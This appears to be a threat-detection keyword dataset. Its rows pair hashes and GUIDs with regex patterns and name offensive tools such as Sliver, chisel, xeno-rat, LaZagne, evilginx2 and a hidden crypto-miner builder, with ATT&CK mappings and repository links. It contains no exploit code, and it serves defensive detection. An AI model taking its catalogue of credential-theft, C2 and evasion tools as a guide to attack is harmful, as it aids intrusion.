"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*",".{0,1000}881D4D67\-46DD\-4F40\-A813\-C9D3C8BE0965.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*886c0eac43136acee5b85b22c72965d63faf9b9f70ed28deca9c3b028b22dee8*",".{0,1000}886c0eac43136acee5b85b22c72965d63faf9b9f70ed28deca9c3b028b22dee8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*886de66b761338d87027254c40da3ea0fd9072fc301c1b8fdd2e4d652e231dea*",".{0,1000}886de66b761338d87027254c40da3ea0fd9072fc301c1b8fdd2e4d652e231dea.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8879933fd0c682fa48bfa79023b5730f6ee8e984e8cde1b275a64b098473e424*",".{0,1000}8879933fd0c682fa48bfa79023b5730f6ee8e984e8cde1b275a64b098473e424.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*88a56a39fa828dee79620714e53285c2c5bfbec814e64ab150d8795b0d78940c*",".{0,1000}88a56a39fa828dee79620714e53285c2c5bfbec814e64ab150d8795b0d78940c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*88B40068-B3DB-4C2F-86F9-8EADC52CFE58*",".{0,1000}88B40068\-B3DB\-4C2F\-86F9\-8EADC52CFE58.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*88babbe96838fcad9b486bd36f4bce32d242848ab4aa71c739fd6338dea37a68*",".{0,1000}88babbe96838fcad9b486bd36f4bce32d242848ab4aa71c739fd6338dea37a68.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*88c940e5e4e3728a9433887cfd7eb308d8d4e5e24f5ab49b3c13dcc595da89d0*",".{0,1000}88c940e5e4e3728a9433887cfd7eb308d8d4e5e24f5ab49b3c13dcc595da89d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*88e3cee91cfda389858ecd70bf3f9b8e45ce7d41761cb7b13075e8d003724007*",".{0,1000}88e3cee91cfda389858ecd70bf3f9b8e45ce7d41761cb7b13075e8d003724007.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*890f13ab9ee7ea722baf0ceb3ee561c0*",".{0,1000}890f13ab9ee7ea722baf0ceb3ee561c0.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*894a784e-e04c-483c-a762-b6c03e744d0b*",".{0,1000}894a784e\-e04c\-483c\-a762\-b6c03e744d0b.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*89873326f393acc1d9c4ff7d897f60db68075d418a034c377a2d72cd1a09c95b*",".{0,1000}89873326f393acc1d9c4ff7d897f60db68075d418a034c377a2d72cd1a09c95b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*89a687f0367983c98008e9bd2d82e6aa579e24f2d702b6912eeae74b21e85dc9*",".{0,1000}89a687f0367983c98008e9bd2d82e6aa579e24f2d702b6912eeae74b21e85dc9.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*89b8e0c1afe4680c8f02e517467a71a4a2559f41792565bd646f0127642782a1*",".{0,1000}89b8e0c1afe4680c8f02e517467a71a4a2559f41792565bd646f0127642782a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*89d3f128432dd85a62c1f1c394dc8a0397ba23c5a193449dabcae0d1f84d3b18*",".{0,1000}89d3f128432dd85a62c1f1c394dc8a0397ba23c5a193449dabcae0d1f84d3b18.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*89eab8092b36ec3ea05291a614742f9f926685f89c2b25fd5804974292255b3b*",".{0,1000}89eab8092b36ec3ea05291a614742f9f926685f89c2b25fd5804974292255b3b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8A15D28C-252A-4FCC-8BBD-BC3802C0320A*",".{0,1000}8A15D28C\-252A\-4FCC\-8BBD\-BC3802C0320A.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*8a417e475065810997e9920df3b411696a4d494abb4204921fd6cb54ff455daa*",".{0,1000}8a417e475065810997e9920df3b411696a4d494abb4204921fd6cb54ff455daa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8a586d7528567dec07746cd375daf9cf8828abee9806fda6125d73323d4fbee4*",".{0,1000}8a586d7528567dec07746cd375daf9cf8828abee9806fda6125d73323d4fbee4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8a5d969cab714560a2c7109d7a70bf653d860b846929d2db55782f4ec2604597*",".{0,1000}8a5d969cab714560a2c7109d7a70bf653d860b846929d2db55782f4ec2604597.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8a65c348023a1a5555beb0cde66891fd39dcbd8e6fc02c1ce2022ac2afe68a5e*",".{0,1000}8a65c348023a1a5555beb0cde66891fd39dcbd8e6fc02c1ce2022ac2afe68a5e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*8a92acfe944c48f247b50ea26cb82f367e668959c115739c025d1ad4ca59a27a*",".{0,1000}8a92acfe944c48f247b50ea26cb82f367e668959c115739c025d1ad4ca59a27a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379*",".{0,1000}8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*8aac7bb51d605351a79f988d1b1772ae94d4b8ab4622118259effad125719e99*",".{0,1000}8aac7bb51d605351a79f988d1b1772ae94d4b8ab4622118259effad125719e99.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*8aba74be7acef3c84cef0163411298aa994872347a4ac84cc0a0d19ddf0eb65c*",".{0,1000}8aba74be7acef3c84cef0163411298aa994872347a4ac84cc0a0d19ddf0eb65c.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*8ac384fed6ad25cb08874eb3dc9b45c80084fa5518ec5a7fa79e3f5d5e40b66e*",".{0,1000}8ac384fed6ad25cb08874eb3dc9b45c80084fa5518ec5a7fa79e3f5d5e40b66e.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*8ae33d1da163dd41ff4bfe07f9b290d6fa2a46b592735ec9734477534760ea5e*",".{0,1000}8ae33d1da163dd41ff4bfe07f9b290d6fa2a46b592735ec9734477534760ea5e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*8b081e47fc6d4ab5dc0483dcc7243ff66911b9e660ab8ad9296a7144e95dbd47*",".{0,1000}8b081e47fc6d4ab5dc0483dcc7243ff66911b9e660ab8ad9296a7144e95dbd47.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*8b181b6d9004ec5341ed9adeaaf5f43ece0479da86687e7f3e70788d282df356*",".{0,1000}8b181b6d9004ec5341ed9adeaaf5f43ece0479da86687e7f3e70788d282df356.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8b30d6cf12fb57cfd41dd6a41b5f16b04642a019ae57074a4f884a8d5f97699c*",".{0,1000}8b30d6cf12fb57cfd41dd6a41b5f16b04642a019ae57074a4f884a8d5f97699c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8b3dc5f7f95e60cc22e2e41bf2c000c3ab16983493bae2427b92f984147de598*",".{0,1000}8b3dc5f7f95e60cc22e2e41bf2c000c3ab16983493bae2427b92f984147de598.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8b41d9f80065f1bdcef489969e314c71f6f36265f6b6b5250a90608b9f393cdb*",".{0,1000}8b41d9f80065f1bdcef489969e314c71f6f36265f6b6b5250a90608b9f393cdb.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*8b4cb728e2db083daf0b42a3d3e6982e161ba42f90264e6da1508800e4b4d394*",".{0,1000}8b4cb728e2db083daf0b42a3d3e6982e161ba42f90264e6da1508800e4b4d394.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*8b4da3fc66c36752ab032c8d57a0df7caa530d07c3e9847582ff2d792768ff12*",".{0,1000}8b4da3fc66c36752ab032c8d57a0df7caa530d07c3e9847582ff2d792768ff12.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8b53f3b214e31f24b635bc45651cf7004da4718cb0b8c844d27836153711da3d*",".{0,1000}8b53f3b214e31f24b635bc45651cf7004da4718cb0b8c844d27836153711da3d.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*8B605B2E-AAD2-46FB-A348-27E3AABA4C9C*",".{0,1000}8B605B2E\-AAD2\-46FB\-A348\-27E3AABA4C9C.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*8ba2d0dc05dc4a81e064e9bf70eb3681f661b026c7daec1433fb8dad4b9d8a1f*",".{0,1000}8ba2d0dc05dc4a81e064e9bf70eb3681f661b026c7daec1433fb8dad4b9d8a1f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8ba79d96e4337be960e4dd1ce94a622c08391da243fee05a44d303de46f9ae93*",".{0,1000}8ba79d96e4337be960e4dd1ce94a622c08391da243fee05a44d303de46f9ae93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8BAAEFF6-1840-4430-AA05-47F2877E3235*",".{0,1000}8BAAEFF6\-1840\-4430\-AA05\-47F2877E3235.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*8bb972b4dc7e0c5b8db0be349ecf62043e69ea1273d5298f8e55c02fa047712c*",".{0,1000}8bb972b4dc7e0c5b8db0be349ecf62043e69ea1273d5298f8e55c02fa047712c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N.*",".{0,1000}8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N\..{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*8bc3958a70372ecaeba0b81e287692297974848cc2ecf053ea7ebb9dfcc933f8*",".{0,1000}8bc3958a70372ecaeba0b81e287692297974848cc2ecf053ea7ebb9dfcc933f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8bce6c99c0ac4b8d76c49f6e4dece996b77bb7d71d9acdbfcf5b0460811adfb9*",".{0,1000}8bce6c99c0ac4b8d76c49f6e4dece996b77bb7d71d9acdbfcf5b0460811adfb9.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*8BF82BBE-909C-4777-A2FC-EA7C070FF43E*",".{0,1000}8BF82BBE\-909C\-4777\-A2FC\-EA7C070FF43E.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*8c1007a1d0abce7187cc43079832d6b2b9510aee7c15e1eb2f322d8cc854cf3b*",".{0,1000}8c1007a1d0abce7187cc43079832d6b2b9510aee7c15e1eb2f322d8cc854cf3b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8c34fc93d2e71f3faeaa17b1507a70d87e09ec7bafd7922dff22ba887c304db5*",".{0,1000}8c34fc93d2e71f3faeaa17b1507a70d87e09ec7bafd7922dff22ba887c304db5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - 